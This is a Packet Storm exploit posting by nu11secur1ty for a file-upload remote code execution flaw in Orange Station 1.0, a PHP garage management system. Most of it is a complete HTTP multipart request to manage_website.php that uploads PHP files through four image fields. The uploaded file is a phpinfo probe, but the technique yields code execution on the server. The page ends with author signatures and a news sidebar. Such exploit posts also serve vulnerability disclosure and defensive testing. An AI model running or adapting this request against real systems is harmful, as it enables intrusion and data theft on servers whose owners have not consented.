Headline

Orange Station 1.0 Shell Upload

Orange Station version 1.0 suffers from a remote shell upload vulnerability.

8 months ago

Packet Storm

Open in Source

#sql #vulnerability #web #windows #apple #php #rce #auth #chrome #webkit

Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability

Author: nu11secur1ty

Date: 03/26/2024

Vendor: https://www.mayurik.com/

Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

Reference: https://portswigger.net/web-security/file-upload,

https://www.bugcrowd.com/glossary/remote-code-execution-rce/

Description:

The parameters back_login_image, login_image, invoice_image, and
website_image in the manage_website.php application are vulnerable for
File Upload and the server is vulnerable for Remote code execution
after this.
The attacker who has credentials to this system can upload any PHP
file and he can destroy the system or he can steal a very
sensitive information.

STATUS: HIGH-CRITICAL Vulnerability

Exploit:

POST /garage/garage/manage_website.php HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n  
Content-Length: 1871  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://pwnedhost.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://pwnedhost.com/garage/garage/manage_website.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=0, i  
Connection: close

------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="title"

Orange Station  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="footer"

Admin PanelÃ‚Â  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="short_title"

9090909090  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="currency_code"

Shivaji Nagar, Nashik  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="currency_symbol"

Ã¢â€šÂ¹  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_website_image"

logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="website_image"; filename="info.php"  
Content-Type: application/octet-stream

<?php  
  phpinfo();  
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_invoice_image"

logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="invoice_image"; filename="info.php"  
Content-Type: application/octet-stream

<?php  
  phpinfo();  
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_login_image"

logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="login_image"; filename="info.php"  
Content-Type: application/octet-stream

<?php  
  phpinfo();  
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_back_login_image"

service.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="back_login_image"; filename="info.php"  
Content-Type: application/octet-stream

<?php  
  phpinfo();  
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="btn_web"

------WebKitFormBoundaryytBZTydZ8OfOJjda--

Proof and Exploit:

href

Time spent:

00:27:00

–
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/

–
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution

15 hours ago

Packet Storm

Judge0 Sandbox Escape

15 hours ago

Packet Storm

Wireshark Analyzer 4.4.2

15 hours ago

Packet Storm

Falco 0.39.2

15 hours ago

Packet Storm

Ubuntu Security Notice USN-7118-1

16 hours ago

Packet Storm